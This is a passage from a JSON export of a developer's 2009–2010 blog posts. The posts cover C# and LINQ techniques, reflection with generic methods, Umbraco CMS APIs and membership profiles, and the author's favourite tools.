worksheet. There are 4 bits of data we need to output here:\nNumber of columns Number of Rows Header Data Rows To illistrate the power of LINQ I’ve actually dynamically generated the header row: Update: You should get dataToShow.First() not dataToShow.ToList() so you can get the properties for the header\nvar headerRow = from p in dataToShow.First().GetType().GetProperties() select new XElement(mainNamespace + "Cell", new XElement(mainNamespace + "Data", new XAttribute(ss + "Type", "String"), p.Name ) ); This is just a little bit of fun using LINQ and Reflection to dynamically generate the column headers ;)\nNext we need to output the number of columns and number of rows (keep in mind the rows is the data count + header row count):\nnew XAttribute(ss + "ExpandedColumnCount", headerRow.Count()), new XAttribute(ss + "ExpandedRowCount", dataToShow.Count() + 1), Now we put out the header cells:\nnew XElement(mainNamespace + "Row", new XAttribute(ss + "StyleID", "Header"), headerRow ), Then lastly we generate the data cells (note - this can be done like the header, just chose to do it differently to illistrate that it can be done several ways):\n(yes I used an image this time, the formatting is a real bitch in the Umbraco WYSIWYG editor!).\nLastly there needs to be a WorksheetOptions node, and then you can combine all the XElements together, add it to an XDocument object and save!\nThere you have it, how to create an Excel document using LINQ to XML and C#.\nDownload the source here.\n", "id": "2010-04-08-linq-to-xml-to-excel" }, { "title": "Problems with Assembly Trust", "url": "https://www.aaron-powell.com/posts/2010-04-08-problems-with-assembly-trust/", "date": "Thu, 08 Apr 2010 00:00:00 +0000", "tags": [ ".net", "trust-level", "autofac", "fail" ], "description": "Something to be careful of with downloading assemblies", "content": "When I was migrating PaulPad to ASP.NET MVC2 I decided that I wanted to also upgrade it to Autofac2. The main reason for it was the type registration is much nicer with it’s lambda syntax than it was in the 1.4 release which PaulPad previously used.\nSo I set about downloading the latest version of Autofac and getting it up and running.\nBecause Autofac2 supports both MVC1 and MVC2 I needed to use Assembly Binding to ensure that it worked properly. And this is where everything started to go bad. I kept getting weird a weird runtime error, an EntryPointNotFoundException was being thrown.\nAt the time I couldn’t get Autofac2 to compile for .NET 3.5 (I’ve since produced a patch to fix that) so I was in a world of pain.\nI did manage to get it working by implementing my own controller registration and my own IControllerFactory and then it was working fine, even though I used the source of the AutofacControllerFactory! By now I was scratching my head massively, I mean, I’m doing exactly what they are doing, but why does mine not work?\nFrom the limited debugging I was able to do (kind of hard when you don’t have the Autofac PDB’s) I found out that when calling builder.RegisterControllers nothing was happening. The controllers weren’t being found. Huh? But they were in the assembly, so it wasn’t making sense.\nOnce I got Autofac to compile though I did some debugging and was getting a weird error when it run the following code:\ntypeof(IController).IsAssignableFrom(controllerType); The error was:\nType IController exists in System.Web.Mvc.dll and System.Web.Mvc.dll\n(Well, something to that effect anyway)\nSo I was sitting there with a completely dumbfounded looked on my face, of course it exists in that assembly, by why does it look there twice? The only logical thought was that it wasn’t doing the assembly binding properly. But how can that be? I’ve not had assembly finding fail before, if it failed it shouldn’t have compiled.\nShit wasn’t making sense.\nSo I rolled back to my downloaded version of Autofac and decided to check the version number, but immediately upon opening up the properties dialog I say the message “This file came from another computer and might be blocked to help protect this computer”, and then there was the Unblock button.\nfacepalm\nSo I clicked Unblock, compiled and magic happened. It all worked, no problems what so ever.\nMoral of this story Trust everyone\n", "id": "2010-04-08-problems-with-assembly-trust" }, { "title": "Reflection And Generics", "url": "https://www.aaron-powell.com/posts/2010-04-08-reflection-and-generics/", "date": "Thu, 08 Apr 2010 00:00:00 +0000", "tags": [ ".net", "reflection", "searing-pain" ], "description": "Oh the pain, OH THE PAIN", "content": "Or to name this another way… Oh my god the pain.\nAnyone who’s been brave enough to delve into the bowels of the Umbraco Interaction Layer will have been able to see just how much Reflection I’m using, for those who haven’t think about this. With the UIL I needed a way to find all the properties of a generated class and be able to either populate all of them or save from all of them. To do that I’ve got some custom attributes which decorate the properties which I look out for.\nNow this in itself isn’t a problem, all my properties are strongly typed, it’s all sweet. The problem was around the populating of the data when you open an existing Umbraco document object. I have two generic methods in my Helper library (which have many an appearance in my Umbraco Membership class too!) which have the construct:\npublic static T GetPropertyValue<T>(Document doc, string key); public static T GetPropertyValue<T>(Document doc, string key, T defaultValue); ou’ll notice that one is an overload, and the overload parameter is a generic. This is where the problem arises.\nBecause the generic is defined at use-time there’s no type in the .NET framework which can represent something as a generic like you can with an Int32 or a String, and this is where the problem arises, how do you find the overloaded method using reflection, and once it’s found how do you invoke it!?\nFirst things first, finding the method There’s no simple way in which you do this, in fact, it’s actually rather hacky. If you’re not familiar with finding methods with Reflection you should probably have a read of this http://msdn.microsoft.com/en-us/library/system.reflection.aspx.\nYou’d be mistaken for thinking that you can just pass in the method name, cuz it’s an overload Reflection doesn’t know what you want. So the most likely one you need is Type.GetMethod Method (String, BindingFlags, Binder, array[]()[], array[]()[]), but you notice something, you need to pass in the type of ALL the parameters for the method. Crap, one is a generic type, so it can’t be specified! This is where I hit a snag, and from all my research the only solution was a dirty little hack.\nWe know what’s different between the two methods, one has two parameters, the other has three, and this is how we’re going to find the sucker. On the Type class there’s another method, Type.GetMethods() or as I prefer to use (to improve performance) Type.GetMethods(BindingFlags bindingAttr). This will get you an array of methods with the right access levels.\nNow let’s pull out our old friend LINQ and find the sucker in the array, we end up with something like this:\nMethodInfo method = typeof(Helper).GetMethods(BindingFlags.Public | BindingFlags.Static).First(m => m.Name == "GetPropertyValue" && m.GetParameters().Count() == 3); Invoking the method Ok, so we found the method but how do we invoke it if it’s generic? That’s actually quite easy:\nint methodResult = (int)method.MakeGenericMethod(typeof(int)).Invoke(null, new object[] { doc, “SomeAlias” }); So I make a generic instance of the method using a specified type as the generic type and then invoke it! This is the best and most optimised solution I’ve been able to come up with so far, if anyone can think of something better I’d love to hear it!\n", "id": "2010-04-08-reflection-and-generics" }, { "title": "The great Umbraco API misconception", "url": "https://www.aaron-powell.com/posts/2010-04-08-the-great-umbraco-api-misconception/", "date": "Thu, 08 Apr 2010 00:00:00 +0000", "tags": [ "umbraco", "cms", ".net", "caution" ], "description": "Sometimes the truth hurts", "content": "When Umbraco 4 was released it was a very exciting that there was an event model around everything in the back-end. This meant you could more powerful ActionHandlers firing on pre and post events (even though they are named against the standard .NET naming conventions).\nAlso, people were very excited that when a pre, sorry, before event fired it was possible to do a cancel on the event args. This was really good for a Save event, it meant for more custom actions, business logic around the saving, you name it.\nBut there’s a problem, canceling the save doesn’t do anything, the data is still saved! But what, that’s not right, I canceled the event.\nAnd here is the problem, calling Save on a Document object does nothing! Nothing at all except firing the events.\nSo when does the data get saved, well that happens in this line:\ndoc.getProperty("my_property").Value = "Hello World!"; That’s right, the Set statement of the Value property of a Property object (well actually the Set statement of the associated IData.Value property, which is what’s called from Property.set_Value).\nWell yeah, that’s the problem right there, if the Set statement does the save, doing the Save method has been rather pointless. It’s also got a really horrible problem of doing a shit load of database calls.\nSo next time you try and hook into the Save event to try and prevent a Save from happening, well sorry to break it to you, it just wont work! Sure you could tie into the rollback feature as well so when you’re doing a canceled save you can rollback to the previous version, just make sure you don’t recall the Save method and get stuck in a rollback loop! :P\nI think we may fix this in v5, but you don’t want all the fun nuance of Umbraco going now do you? :P\nWhat can I do? So is there anything that you can do to get around the eventing order with Umbraco? The answer is yes, yes you can.\nWhy is it like this? If you’re interested in knowing why this happens check out my article on the design of data types.\n", "id": "2010-04-08-the-great-umbraco-api-misconception" }, { "title": "Why no Umbraco on Aaron-Powell.com?", "url": "https://www.aaron-powell.com/posts/2010-04-08-why-no-umbraco/", "date": "Thu, 08 Apr 2010 00:00:00 +0000", "tags": [ "umbraco", "blogging", "paulpad" ], "description": "Why does the new version of Aaron-Powell.com not use Umbraco?", "content": "So unsurprisingly I’ve had a few people question why I’m not using Umbraco for the latest version of Aaron-Powell.com.\nFirst off let’s just have a look back on my blogging and the blog engines I’ve used.\nBack before I was the world-famous blogger that I am today I used Windows Live Spaces for blogging, yeah, I was just that awesome. But when I decided to buy my own domain I thought it was only appropriate that I started using some actual software.\nI chose Umbraco, which was in version 3 at the time (this was somewhere around August 2008) which wasn’t too bad at the time.\nI installed Warren Buckley’s Creative Web Starter kit which was available at the time. Last year when I met him and he had a look I think he was shocked at just how old a version of it I was running! I had a pretty basic skin on it, which err, was ok (ha!).\nNext I installed the Blog 4 Umbraco package (version 1) which I then rewrote the front end controls for it.\nBy now I was not really using OOTB other than the document types (which I’d also hacked a bit) and it was starting to become a bit of a mess. But I kept with it, I did a major overhaul of it when I produced the LINQ to Umbraco training videos.\nAnd this brings us to the present day. Although my Umbraco site did do what I needed it to do, but I’m never content, so I was looking for the next round of improvements. Since MVC is completely the sex I decided that I wanted to use that as a blogging platform. Now it is true that I could have used Umbraco still, but I don’t really have the time to re-write the front end yet again! :P\nThis is why I chose PaulPad, that and I really liked the OOTB style of the site. Essentially it brought all of what I was looking for in a code base to me with very little work needed.\nSomething else really appealing about PaulPad is that this is actually much less of a blogging platform than it is a wiki platform. Something I had noticed on my Umbraco blogging engine was that it wasn’t great if I wanted to go back and revise a post and have it very obvious. With more of a wiki feel it’s easier to do that. Also, there’s a lot more transparency over the revision history, which will be handy with some upcoming topics.\nLastly, I believe that if you are going to be able to truly evangalise a platform (ie - Umbraco) you can’t just use it. You need to be familiar with your competitors (although PaulPad is hardly a competitor :P), so this is a good way to really just play with something that’s not Umbraco.\nHopefully that sheds some light on my madness regarding my dismissal of Umbraco as my choice of blogging platform.\n", "id": "2010-04-08-why-no-umbraco" }, { "title": "Building LINQ to Umbraco", "url": "https://www.aaron-powell.com/posts/2010-04-07-building-linq-to-umbraco/", "date": "Wed, 07 Apr 2010 00:00:00 +0000", "tags": [ "umbraco", "linq", "linq-to-umbraco" ], "description": "Ever wondered how LINQ to Umbraco was build? Well look no further", "content": "In the beginningLINQ to Umbraco is actually a lot old a project that most people realise, in fact the initial idea of LINQ to Umbraco started when I had a discussion with Niels Hartvig (founder of Umbraco) at the end of 2007 when he was running training in Melbourne.\nBack then C# 3.0 was just released, Visual Studio 2008 was just out and everyone was very excited about this new technology LINQ. I discussed it with him and he really liked the idea of having a LINQ provider, but it was nothing more than a “That would be awesome!” idea. Keep in mind, this is before Umbraco 4.0 had even been released!\nAbout 6 months later I had got fed up with working directly with the Document API (as we were doing a lot of Document creation at the time) and I decided that I would write a wrapper for it. This project was called Umbraco Interaction Layer, and was really just a new way to create/ edit/ delete documents. As an afterthought I decided to add “LINQ” to it, but it was again nothing more than a wrapper on top of the Document API so it was really shit slow (and would really hammer a database!).\nAfter I released the initial version there was a lot of community excitement about having LINQ to Umbraco, so after raising it with Niels that I was planning on writing a proper LINQ provider, one which wouldn’t bring a server to its knees I was asked to join the core team and include it in the Umbraco 4.5 release.\n", "id": "2010-04-07-building-linq-to-umbraco" }, { "title": "C#/ .NET", "url": "https://www.aaron-powell.com/posts/2010-04-07-csharp/", "date": "Wed, 07 Apr 2010 00:00:00 +0000", "tags": [ "c#", ".net" ], "description": "Source of all that I've written about in the .NET world", "content": "##My Projects\nAaronPowell.Dynamics Location Service with F# and Twitter NuGet How to install a package into all projects of a solution Creating a NuGet-based plugin engine Querying NuGet via LINQPad LINQ Articles LINQ to XML to… Excel? Query Syntax vs Method Syntax Lucene.Net Overview The dark arts Reflection and Generics Recursive anonymous functions - the .NET version Why does this code work? Dealing with type casting limitations Dynamic Dictionaries with C# 4.0 Using Lazy<T> with KeyedCollection Miscellaneous Problems with Assembly Trust Working with dates and LINQ to SQL Handy extension method for null-coalesing Supporting ValueTypes in Autofac Testable Email Sending A LINQ observation Musings Are Extension Methods Really Evil?\n", "id": "2010-04-07-csharp" }, { "title": "Extending Umbraco Members", "url": "https://www.aaron-powell.com/posts/2010-04-07-extending-umbraco-members/", "date": "Wed, 07 Apr 2010 00:00:00 +0000", "tags": [ "umbraco", "umbraco-3", "members" ], "description": "", "content": "Recently we’ve had several projects which have come through in which we are building a solution in Umbraco and the client wants to have memberships within the site.\nUmbraco 3.x has a fairly neat membership system but it’s a bit limited when you want to interact with the member at a code level. Because members are just specialised nodes they can quite easily have custom properties put against them, but reading them in your code is less than appealing. You’ve got to make sure you’re reading from the correct alias, typing checking, null checking, etc.\nAnd as I kept finding I was writing the same code over and over again for the reading and writing to the properties I thought I’d put together a small framework class.\nThe framework requires the following Umbraco DLL’s:\nbusinesslogic.dll cms.dll So lets look at some sections of the class.\nDefault Properties A member has a few default properties which are also built into the framework. There are also a few additional properties which the framework uses (such as the MembershipTypeId) which are coded in. All of the default properties are virtual so they can be overriden if so desired. An interesting addition I have made is the IsDirty property. This is used later on during the Save to ensure that only members who have actually got data changed are saved back into Umbraco. This limits database hits and improves performance.\nConstructors I’ve found that there are 3 really useful constructors, a new member constructor and two existing member constructors. What you’ll notice from this is that the constructor which takes an Umbraco member is actually marked as private. This is because the framework is targetted at multi-teired applications, like MVC/ MVP where you want to keep data layers separate from the others. And by doing this you can avoid having the Umbraco DLL’s included in any other project in your solution.\nNext you’ll notice a call to the method PopulateCustomProperties, this is an abstract method which you need to implement yourself to populate your own properties on a membership object.\nClick to see the Saving method.\nNotice the use of the IsDirty flag to ensure we’re only saving what we should save.\nHelper Methods I’ve provided a few helper methods which can be used for the reading and writing of custom properties on the Umbraco membership object.\nThe two get methods handle the null and default data checking, along with casting back to the appriate data type. Here’s an example implementation:\nThe save is really just a shortcut, I was sick of typing out that same command every time, to use it you would call it from the PrepareMemberForSaving method like so:\nAnd we’re done\nSo there you have it, a simple little class for creating a .NET implementation of an Umbraco member.\nThere are two downloads available, Member.cs or a compiled DLL.\nIt will be interesting though when Umbraco 4 ships and the membership model changes to use the ASP.NET membership providers…\n", "id": "2010-04-07-extending-umbraco-members" }, { "title": "Overview", "url": "https://www.aaron-powell.com/posts/2010-04-07-linq-to-umbraco-overview/", "date": "Wed, 07 Apr 2010 00:00:00 +0000", "tags": [ "umbaco", "linq-to-umbraco" ], "description": "An overview of LINQ to Umbraco", "content": "What?Anyone who has had to do a lot of work with the Umbraco API and interacting with nodes will know that using the .NET API isn’t great. It’s not bad, but in a strongly typed world a loosely typed objects are no where near as much fun.\nEspecially if you want to move around those items!\nUmbraco is more than just a content management system, Umbraco a great application framework. If you start looking conceptually at Document Types in Umbraco you’re realise that they are really just a way of describing data. So to this end they are actually really great at describing .NET types.\nLINQ to Umbraco aims to take these meta-types which you are defining within the CMS and generate strongly typed representations of them which you can work with at a .NET level.\nBecome the types defined in Umbraco can be easily used to represent any data. To this end LINQ to Umbraco is provider based, allowing the underling data source to be defined by the developer.\nProvider Based? Because of the way LINQ to Umbraco is designed it is possible to swap-out the way that the data is access within itself. This is what the UmbracoDataProvider class is used for.\nOut of the box LINQ to Umbraco supplies a single UmbracoDataProvider implementation, the NodeDataProvider.\nThe NodeDataProvider is designed to interact with the XML cache of Umbraco, working with published data. This provides read-only operations, despite LINQ to Umbraco providing full CRUD capabilities.\nWhen to use it?LINQ to Umbraco is not designed to be a replacement for XSLT, nor is it to be a complete replacement for the existing Umbraco API’s.\nThat’s not saying it can’t be used in these scenarios, but LINQ to Umbraco is best used when you’re looking at Umbraco data in a site-wide scope.\nDesignThe design of LINQ to Umbraco borrows very heavily from that of LINQ to SQL, by having a DataContext which all interactions flow out from.\nBecause of this (and due to the provider model) there is no understanding of the data hierarchy. With the initial access of the data from the DataContext it looks at the data as a whole picture, allowing you to not concern yourself with the hierarchy, unless you need it.\nIn addition to having a LINQ to SQL style DataContext all of the hierarchy of Umbraco is matched by LINQ to Umbraco. This means that you can traverse down a node’s children collections, in a strongly typed manner.\n", "id": "2010-04-07-linq-to-umbraco-overview" }, { "title": "Training Vidoes", "url": "https://www.aaron-powell.com/posts/2010-04-07-training-videos/", "date": "Wed, 07 Apr 2010 00:00:00 +0000", "tags": [], "description": "Instructional videos to get you up and running with LINQ to Umbraco", "content": "In an effort to get everyone up to speed with LINQ to Umbraco I have put together a series of videos. This series looks at how you can use LINQ to Umbraco to create a simple blog engine.\nSession 1 Getting Stardted\nIn this session I’ll be looking at the basics of what is required for LINQ to Umbraco. We’ll look at how to generate the classes and some suggestions on how to get the best generated class names.\nSession 2 Working with LINQ to Umbraco entities\nIn this session I’ll be looking at the code which was generated from the first session and how we can do some basic interactions. We’ll also create our first control using LINQ to Umbraco.\nSession 3 Delving into the UmbracoDataContext\nIn this session I’ll be looking at the heart of LINQ to Umbraco, the UmbracoDataContext. We’ll look at what it’s role is, and how it can be used in extensibility.\nSession 4 Performance and Caching\nIn this session I’ll look at how to get the most out of performance and the caching which is built into LINQ to Umbraco.\nSession 5 Paging and Control-less forms\nIn this session I’ll be looking at how easy it is to do paging with LINQ to Umbraco entities. Also with MVC being such a hot topic I’ll show you how you can make a form which renders LINQ to Umbraco with no ASP.NET server controls.\nSession 6 Outputting XML\nIn this session I’ll be looking at how you can transform the LINQ to Umbraco entities and generate an XML response, for something such as a RSS feed.\n", "id": "2010-04-07-training-videos" }, { "title": "Umbraco Members Profiles", "url": "https://www.aaron-powell.com/posts/2010-04-07-umbraco-members-profiles/", "date": "Wed, 07 Apr 2010 00:00:00 +0000", "tags": [ "umbraco", "members" ], "description": "", "content": "Almost 12 months ago I did a post looking at how to make .NET interaction with Umbraco Members easier (Extending Umbraco Members). This was for Umbraco 3.x, but now with Umbraco 4.x a question that has been coming up a lot on the Umbraco forums of recent is how to work with the Umbraco Membership. When Umbraco 4 was released it brought in the implementation of the ASP.NET Membership classes (MembershipProvider, RoleProvider and ProfileProvider).\nThese classes were implemented via the umbraco.providers assembly and were essentially just wrappers for the underlying Umbraco Member/ Member Type/ Member Group classes.\nAlthough they still go through the Umbraco API underneath what was very nice was that now it was possible to use the standard ASP.NET login controls, Forms Authentication, etc. And if you’re really brave you could drop in your own membership provider, such as the SqlMembershipProvider or any custom solution you’d written.\nSomething that seems to have been neglected is how to work with the Member Type information. By default you only have Name, Username and Password on a Member in Umbraco, so we extend it via the MemberType, but how do we get that data back? Generally people will just use the Umbraco API and the Member.getProperty(alias) method, but that kind of nulls the point of having the ASP.NET Membership available to us, and what if you did want to swap out the providers (although I highly doubt that would ever happen)?\nThat’s what I’m going to explain here, how you can use the ASP.NET ProfileProvider and it’s associated classes with an Umbraco-defined MemberType.\nOur Member Type For this I’m going to have a very basic little Member Type, it’ll have three bits of data on it, First Name, Middle Name and Last Name.\nAs you can see these are defined as per normal, nothing special about that. I can then go to my Umbraco Member and enter some data and view it:\nAccessing via ASP.NET Now we need to be able to access this via ASP.NET, there are two things we need to configure. First is we want to define our .NET class which represents the Member Type. To do this we need to create a class which inherits from System.Web.Profile.ProfileBase:\nusing System; using System.Web.Profile; public class MemberProfile : ProfileBase { ... } Now we have to define the properties which we want exposed from our MemberType. The nice thing is here I don’t have to expose everything, if there was a property which I didn’t want/ need access to, I can easily just leave it out. So lets define our properties:\n[SettingsAllowAnonymous(false)] public string FirstName { get { var o = base.GetPropertyValue("first_name"); if (o == DBNull.Value) { return string.Empty; } return (string)o; } set { base.SetPropertyValue("first_name", value); } } [SettingsAllowAnonymous(false)] public string LastName { get { var o = base.GetPropertyValue("last_name"); if (o == DBNull.Value) { return string.Empty; } return (string)o; } set { base.SetPropertyValue("last_name", value); } } [SettingsAllowAnonymous(false)] public string MiddleName { get { var o = base.GetPropertyValue("middle_name"); if (o == DBNull.Value) { return string.Empty; } return (string)o; } set { base.SetPropertyValue("middle_name", value); } } So as you can see I’ve created three properties which we are exposing. Notice how all of them are doing a base.GetPropertyValue(string) method call, and the string we are passing in is the Alias of the Member Type property. This is because we’ll be using the Umbraco ProfileProvider which expects the property alias. This means that we can easily create a friendly name in our class for the property (such as FirstName) and pass through the un-friendly name as the alisa (first_name). Additionally I’ve marked all the classes with the SettingsAllowAnonymousAttribute and set it to false. Profiles in ASP.NET Membership can support anonymous profiles, but I wont be covering that.\nNow that we’ve defined our class for the profile we need to tell ASP.NET to use it. This is really easy, thanks to the umbraco.provider.members.UmbracoProfileProvider class. This class is an implementation of the ProfileProvider abstract class, and is designed to get the profile information for an Umbraco member.\nSo we need to set up our web.config like so:\n<system.web> <profile defaultProvider="UmbracoMemberProfileProvider" enabled="true" inherits="UmbracoMemberDemo.Web.MemberProfile, UmbracoMemberDemo.Web"> <providers> <clear /> <add name="UmbracoMemberProfileProvider" type="umbraco.providers.members.UmbracoProfileProvider, umbraco.providers" /> </providers> <properties> <clear /> <add name="first_name" allowAnonymous ="false" provider="UmbracoMemberProfileProvider" type="System.String" /> <add name="last_name" allowAnonymous ="false" provider="UmbracoMemberProfileProvider" type="System.String" /> <add name="middle_name" allowAnonymous ="false" provider="UmbracoMemberProfileProvider" type="System.String" /> </properties> </profile> </system.web> So what have we done? Well on the node I have defined that I want to use the UmbracoMemberProfileProvider as the default (if I had multiple profile providers defined that is of relivance) and that the profile will inherit my class UmbracoMember.Web.MemberProfile which is in the UmbracoMemberDemo.Web assembly. This will let ASP.NET know the class type and I can then access the properties through my class.\nLastly I defined the properties which are in the class, with their name being the Alias in Umbraco. I’ve also explicity defined the provider they will come from, again if I had multiple providers defined I could have multiple locations where I get the data, and it’s at the property level I would define where it comes from.\nUsing the Profile Well we’ve set up all that really needs to be set up, it’s really that simple! But how do we access the data in the profile? Well I’m going to make an assumption that you have secured pages and the following code is being run within one.\nFrom the current HttpContext object we have access to the profile, via HttpContext.Current.Profile and this will return me a ProfileBase instance. So I can now do this:\nstring firstName = ((MemberProfile)HttpContext.Current.Profile).FistName; And remember that the property has a setter as well, so I can write back to it as well, which will the write back to Umbraco.\nI can make a .NET user control and do something like this also:\n<div> <p> <span>First Name: <%= ((UmbracoMemberTester.Web.MemberProfile)Context.Profile).FirstName %></span> </p> <p> <span>Middle Name: <%= ((UmbracoMemberTester.Web.MemberProfile)Context.Profile).MiddleName %></span> </p> <p> <span>Last Name: <%= ((UmbracoMemberTester.Web.MemberProfile)Context.Profile).LastName %></span> </p> </div> That bit of code does not even require a back-end file for the User Control. And how does it look? Well just like this:\nConclusion I hope that this has been useful and explains just how easy it can be to use standard ASP.NET features to expose Umbraco Member Types.\n", "id": "2010-04-07-umbraco-members-profiles" }, { "title": "Random Stuff!", "url": "https://www.aaron-powell.com/posts/2010-04-06-random/", "date": "Tue, 06 Apr 2010 00:00:00 +0000", "tags": [ "random", "ranting" ], "description": "So it doesn't fall into other categories? You'll find it here, along with random rants.", "content": "##Random posts and Ranting##\n2009, a year in review Oh woe is (Mobile)Me 2010, a year in review Useful Tools Developer Tools LinqPad Best way to test C# or VB.NET without having to create a console application Notepad++ My choice for a Notepad replacement. Syntax highlighting in just about every language RedGate’s Reflector If you’re a .NET dev and don’t have this installed get out of my framework Expresso By far my favorite Regular Expression builder and tester WinMerge If you’re using SVN, or just need to be able to diff and merge files or folders this is what you want Web Developer Tools Charles I was a fan of Fiddler but since using Charles I can’t go back. I don’t know how they can do so much stuff with Java! Supports all major OS’s. I don’t care that it’s not free, it’s completely worth the money Administration Tools SmartFTP I’ve used a lot of FTP clients and this is by far the best. Lovely UI, great FTP management, but my favorite feature would have to be the differential uploading. It looks at a file and works out if it should be replaced. Saves bandwidth by not uploading what you don’t need to upload. It’s also highly configurable. Well worth the money mRemote Need to RDP into lots of machines? This is the best tool I’ve used for that. Supports all major remote-connection protocols. Having the ability to create folders and “filter down” the settings to the connections within it is great if you need to use the same credentials on lots of machines ", "id": "2010-04-06-random" }, { "title": "Web Development", "url": "https://www.aaron-powell.com/posts/2010-04-04-web-dev/", "date": "Sun, 04 Apr 2010 00:00:00 +0000", "tags": [ "web", "asp.net", "javascript" ], "description": "Articles on the topic of web development", "content": "Being a web developer by trade, and primarily an ASP.NET developer I come across a few musings around fun things to do.\nMy Projects JavaScript Tools Ole Slidee WhatKey.Net ServerHere - When you just need a webserver Talks JavaScript frameworks ASP.NET ASP.NET Web Forms MVP Contrib ASP.NET Web Forms MVP Yes, I LIKE WebForms ASP.NET MVC Model binding with implicit operators XML Action Result Using HttpCompression libraries and ASP.NET MVC FileResult JavaScript & jQuery Recursive Anonymous Functions Creating jQuery plugins for MS AJAX components, dynamically! The Client Event Pool LINQ in JavaScript Not getting DropDownList value when setting it via JavaScript JavaScript functions that rewrite themselves! A look at browser storage Implementing the blink tag using jQuery Implementing the marquee tag using jQuery Combining blink and marquee! A look at browser storage options Animating with JavaScript Making the Internet Explorer JavaScript tools better Miscellaneous SharePoint feature corrupts page layout\n", "id": "2010-04-04-web-dev" }, { "title": "Umbraco", "url": "https://www.aaron-powell.com/posts/2010-04-01-umbraco/", "date": "Thu, 01 Apr 2010 00:00:00 +0000", "tags": [ "umbraco", "cms", ".net" ], "description": "All my articles about the worlds friendliest CMS", "content": "LINQ to UmbracoLINQ to Umbraco is a new API which is coming in Umbraco 4.1 that will provide a provider-model LINQ API for working with Umbraco data.\nOverview Understanding LINQ to Umbraco Why no IQuerable in LINQ to Umbraco Training Videos Building LINQ to Umbraco Creating a RssDataProvider for LINQ to Umbraco LINQ to Umbraco Extensions Home Source Creating a custom LINQ to Umbraco data provider Implementing a Tree class Umbraco APIThe Umbraco API is powerful, but it has some very fun things within it.\nThe great Umbraco API misconception Extending Umbraco Members Umbraco Member Profiles Umbraco Event Improvements Umbraco DataType Design Unit Testing with Umbraco Custom Umbraco Macro Engines NHaml Umbraco Macro Engine User group sessions & Speaking arrangements January 2010 DDD Melbourne CodeGarden 10 General Umbraco Why not Umbraco on Aaron-Powell.com? Why I’m not a fan of XSLT Exception thrown when using XSLT extensions Mercurial 101 A Guide to Contributing How I develop Umbraco Scripting with Umbraco Creating a menu in Umbraco with IronRuby\nIronRuby tips and tricks\nUsing Razor in Umbraco 4\n", "id": "2010-04-01-umbraco" }, { "title": "The answer to why this code works", "url": "https://www.aaron-powell.com/posts/2010-01-23-the-answer-to-why-this-cover-works/", "date": "Sat, 23 Jan 2010 00:00:00 +0000", "tags": [ "generic .net", "umbraco" ], "description": "", "content": "So at the start of this week I put up a blog asking Why this code works, and to be honest I've grown quite a bit of an ego since then as no-one has been able to answer the question correctly.\nOne person did get close, but close doesn't quite cut it ;).\nWell the answer is actually very simple, and it's a really handy feature of the C# language, explicit operators.\nExplicit operators allow you to define explicit casting between types. So the code that was missing from my original post was this:\nview sourceprint?1.public static explicit operator UmbracoPage(XElement x) {2.    return new UmbracoPage(x);3.} What I've done here is defined how the compiler is to treat a casting of an XElement to an instance of UmbracoPage, and since UmbracoPage inherits IUmbracoPage there is already a defined casting to it.\nInside the body of my explicit operator I can do anything I desire, here I'm just returning a new instance, passing the XElement to the constructor.\nI find it really quite elegant, and that it reduces code smell quite nicely.\nBut explicit operators also have a buddy, in the form of implicit operators (which was the close-but-no-cigar answer). These work by the type being defined by the assignment target, eg:\nview sourceprint?1.UmbracoPage page = xElement; I'm personally not a fan of implicit operators though, I find them less obvious when you're reading code.\nSo there you have it, a slightly obscure language feature to play with!\n", "id": "2010-01-23-the-answer-to-why-this-cover-works" }, { "title": "Recursive anonymous functions - the .NET version", "url": "https://www.aaron-powell.com/posts/2009-07-15-recursive-anonymous-functions-the-net-version/", "date": "Wed, 15 Jul 2009 00:00:00 +0000", "tags": [], "description": "To know recursion you must first know recursion", "content": "When playing around with JavaScript I decided to have a look at creating recursive anonymous functions, which are a good bit of fun.\nWell I decided to have a challange, could you do it in .NET? Well lets ignore the pointlessness of the exercise and just enjoy the challenge.\nWell, I did it, it’s sure as shit isn’t pretty but hey, it works. In this post I’ll show off how it works, but to sum it up - Reflection. But not where near as much as you’d think.\nPart of why I wanted to try it was for LINQ to Umbraco, see the performance of how we’re loading nodes at the moment and if we could optimise it (and this isn’t the way if there is one!). I’m doing a recursive call against a XML file, trying to find a node which is at a depth I don’t know.\nWith JavaScript functions there’s the really nice argument.callee which is a reference to the method executing the current method, sadly in .NET we don’t have that, so we have to find it ourselves. Remember, this is an anonymous function, but .NET doesn’t have true anonymous functions, the compiler creates it on our behalf. The method name is something like “<>b__0”, but it’s compile time generated so I don’t really know (I’m sure if you read the documentation on the C# compiler you may be able to work it out, good luck with that :P).\nWe need to look into the stack frame to work out where we are, like this:\nvar thisMethod = new StackFrame(0).GetMethod(); This will return an object representatnion of the current method, which we can invoke ourselves!\nreturn (XElement)thisMethod.Invoke(e, new object[] { ee }); But what’s the invoke doing? Well we’re passing in an instance of the current XElement (e) and we’re doing it for each of that XElements children (e.Elements(), represented by ee). Here’s the recursive part of the method.\nSo lets put it all together:\nif (e.Name == "what_i_want") { return e; } else { if (e.Elements().Count() != 0) { var thisMethod = new StackFrame(0).GetMethod(); foreach (XElement ee in e.Elements()) return (XElement)thisMethod.Invoke(e, new object[] { ee }); } return null; } So that’s the body of the anonymous function, where the variable e is a XElement object. We check the name against the one we want, if it’s not we’ll check it’s children. Alternatively you could do this as a Func<XElement, bool> which would only return the items into the IEnumerable<>, but by returning null we can see how many trees were followed which turned out to be duds. Just change the return statements to boolean values and pass it to anything that takes Func<XElement, bool> (like Where, First, etc).\nSo how do we use it? Like this:\nvar nodes = root.Elements().Select(e => { if (e.Name == "what_i_want") { return e; } else { if (e.Elements().Count() != 0) { var thisMethod = new StackFrame(0).GetMethod(); foreach (XElement ee in e.Elements()) return (XElement)thisMethod.Invoke(e, new object[] { ee }); } return null; } }); And how does it perform, well it’s about 10x slower, but hey, there’s nothing wrong with trying to achieve something crazy! :P\n", "id": "2009-07-15-recursive-anonymous-functions-the-net-version" }, { "title": "People can come up with statistics to prove anything. 14% of people know that", "url": "https://www.aaron-powell.com/posts/2009-06-13-people-can-come-up-with-statistics-to-prove-anything-14-of-people-know-that/", "date": "Sat, 13 Jun 2009 12:05:53 +0000", "tags": [ "Rant" ], "description": "", "content": "Ok, I'm going to go on a bit of a rant here.\nI'm a Mac user, have been for nearly 2 years now and I think buying a Mac was one of the smartest moves I made as a Microsoft developer; I can run virtual machines for everything I do, easily swapping between different OSes. I currently have XP, Vista and Win7 all on my Mac so I can easily test IE6 -> IE8 without any hacks.\nBut Apple can really piss me off some times. This week has seen WWDC going on in the US and by-and-large I've been underwhelmed by it, almost to the point where I'm just plain 